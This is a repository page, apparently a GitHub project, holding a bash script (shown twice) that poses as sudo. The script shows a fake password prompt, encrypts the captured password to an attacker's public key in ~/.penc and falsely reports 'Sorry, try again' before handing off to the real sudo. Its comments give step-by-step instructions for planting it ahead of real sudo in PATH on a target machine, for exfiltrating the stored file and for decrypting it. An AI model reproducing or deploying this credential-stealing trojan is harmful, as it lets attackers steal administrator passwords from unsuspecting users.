YSaxon/sudo

## sudo
#step 1: generate an rsa public/private keypair, and write your public key into the script below
#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
#step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
#note that you could easily modify to spoof other password taking utils like sudosh or su

sudo=`which -a sudo | head -n 2 | tail -n 1` #you could also just edit this to put in the location of real sudo yourself
if [ -s ~/.penc ] #the script has already ran
then
$sudo "$@" #just forward it straight to real sudo

else
read -p "[sudo] password for $(whoami): " -s p #you might need to modify the prompt based on the sudo platform

#replace this with your public key, or you won't be able to decrypt it!!
cat << EOF > ~/.penc
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1LMw8fHhxweSLGhw+n+3
t57lEDScuVFnkiqOxsM1hhHX1Q+Vz4c8EBQkCexsz52Z7WaJYr8UgrnlDjh1QYio
yOzmlu1jjPWOX44faOcvtYzF426Bqotxst90oHe9B1nWzodEtrALi2NDdAoi8I9y
koYPBjxbxn21/XYHQ/9EhqHgO/AQoNgdjji3J874w/8P50XFO/DBJe6rRSpy67Os
HnipEZo+Wb212jTCoI63MoVkjhaa9BzPIHFi/QxKznyILyKjxghAbJibvFF6DXn3
fMO8tCn1NcxP1pZucEJE0JbsDb4zGa3x7X1il1gZQiQwm/UJLwOzmTDiwyIAMncU
JQIDAQAB
-----END PUBLIC KEY-----
EOF

echo $p | openssl rsautl -encrypt -inkey ~/.penc -pubin -out ~/.penc; unset p #encrypt the password with your public key

#this would be a good place to try to exfiltrate the ~/.penc file, otherwise, just come back and look for it later

#as an alternative over here, if the sudo on your platform supports it, consider echo $p | sudo -S "$@"
echo; echo 'Sorry, try again.' && $sudo "$@" #tell them they got it wrong, and they'll assume it's just a typo, then forward them to real sudo
#alternatively, depending on your platform, you could try forwarding the actual password directly to sudo, but not every sudo will take that
fi
	#step 1: generate an rsa public/private keypair, and write your public key into the script below
	#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
	#step 3: after you obtain the encrypted password, decrypt it with cat .penc \| openssl rsautl -decrypt -inkey your_key.priv
	#note that you could easily modify to spoof other password taking utils like sudosh or su

	sudo=`which -a sudo \| head -n 2 \| tail -n 1` #you could also just edit this to put in the location of real sudo yourself
	if [ -s ~/.penc ] #the script has already ran
	then
	$sudo "$@" #just forward it straight to real sudo

	else
	read -p "[sudo] password for $(whoami): " -s p #you might need to modify the prompt based on the sudo platform

	#replace this with your public key, or you won't be able to decrypt it!!
	cat << EOF > ~/.penc
	-----BEGIN PUBLIC KEY-----
	MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1LMw8fHhxweSLGhw+n+3
	t57lEDScuVFnkiqOxsM1hhHX1Q+Vz4c8EBQkCexsz52Z7WaJYr8UgrnlDjh1QYio
	yOzmlu1jjPWOX44faOcvtYzF426Bqotxst90oHe9B1nWzodEtrALi2NDdAoi8I9y
	koYPBjxbxn21/XYHQ/9EhqHgO/AQoNgdjji3J874w/8P50XFO/DBJe6rRSpy67Os
	HnipEZo+Wb212jTCoI63MoVkjhaa9BzPIHFi/QxKznyILyKjxghAbJibvFF6DXn3
	fMO8tCn1NcxP1pZucEJE0JbsDb4zGa3x7X1il1gZQiQwm/UJLwOzmTDiwyIAMncU
	JQIDAQAB
	-----END PUBLIC KEY-----
	EOF

	echo $p \| openssl rsautl -encrypt -inkey ~/.penc -pubin -out ~/.penc; unset p #encrypt the password with your public key

	#this would be a good place to try to exfiltrate the ~/.penc file, otherwise, just come back and look for it later

	#as an alternative over here, if the sudo on your platform supports it, consider echo $p \| sudo -S "$@"
	echo; echo 'Sorry, try again.' && $sudo "$@" #tell them they got it wrong, and they'll assume it's just a typo, then forward them to real sudo
	#alternatively, depending on your platform, you could try forwarding the actual password directly to sudo, but not every sudo will take that
	fi